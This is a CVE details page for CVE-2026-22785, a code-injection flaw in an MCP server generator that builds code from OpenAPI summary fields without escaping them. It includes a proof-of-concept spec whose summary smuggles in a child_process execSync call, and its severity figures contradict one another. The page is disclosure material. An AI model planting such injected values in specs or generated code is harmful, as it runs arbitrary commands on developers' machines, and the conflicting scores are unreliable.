What is the severity of CVE-2026-22785?

CVE-2026-22785 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2026-22785?

Yes, there are known exploits available for CVE-2026-22785. Immediate patching is recommended.

Is there a patch available for CVE-2026-22785?

Yes, patches are available for CVE-2026-22785. Check the vendor advisories for update instructions.

CVE-2026-22785 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v30.0

CVSS v20.0

Priority Score0.0

EPSS Score0.0

None

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

0.0

CVSS

Yes

Exploit

Yes

Patch

Medium Priority

exploit exists

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Impact

The MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to "break out" of the string literal and inject arbitrary code.

Here is an example OpenAPI with the exploit

openapi: 3.0.4
info:
  title: Swagger Petstore - OpenAPI 3.0
  description: |-
    This is a sample Pet Store Server based on the OpenAPI 3.0 specification.  You can find out more about
    Swagger at [https://swagger.io](https://swagger.io). In the third iteration of the pet store, we've switched to the design first approach!
    You can now help us improve the API whether it's by making changes to the definition itself or to the code.
    That way, with time, we can improve the API in general, and expose some of the new features in OAS3.

    Some useful links:
    - [The Pet Store repository](https://github.com/swagger-api/swagger-petstore)
    - [The source API definition for the Pet Store](https://github.com/swagger-api/swagger-petstore/blob/master/src/main/resources/openapi.yaml)
  termsOfService: https://swagger.io/terms/
  contact:
    email: [email protected]
  license:
    name: Apache 2.0
    url: https://www.apache.org/licenses/LICENSE-2.0.html
  version: 1.0.27-SNAPSHOT
externalDocs:
  description: Find out more about Swagger
  url: https://swagger.io
servers:
  - url: https://petstore3.swagger.io/api/v3
tags:
  - name: pet
    description: Everything about your Pets
    externalDocs:
      description: Find out more
      url: https://swagger.io
  - name: store
    description: Access to Petstore orders
    externalDocs:
      description: Find out more about our store
      url: https://swagger.io
  - name: user
    description: Operations about user
paths:
  /pet/findByStatus:
    get:
      tags:
        - pet
      summary: Finds Pets by status.' + require('child_process').execSync("open -a Calculator").toString(),//
      description: Multiple status values can be provided with comma separated strings.
      operationId: findPetsByStatus
      parameters:
        - name: status
          in: query
          description: Status values that need to be considered for filter
          schema:
            type: string
      responses:
        '200':
          description: successful operation
          content:
            application/json:
              schema:
                type: string
        '400':
          description: Invalid status value
        default:
          description: Unexpected error
      security:
        - petstore_auth:
            - write:pets
            - read:pets

CVSS v3 Breakdown

Attack Vector:-

Attack Complexity:-

Privileges Required:-

User Interaction:-

Scope:-

Confidentiality:-

Integrity:-

Availability:-

Exploit References

GitHub

Patch References

Github.com

CVE-2026-22785

Impact

Patches

Workarounds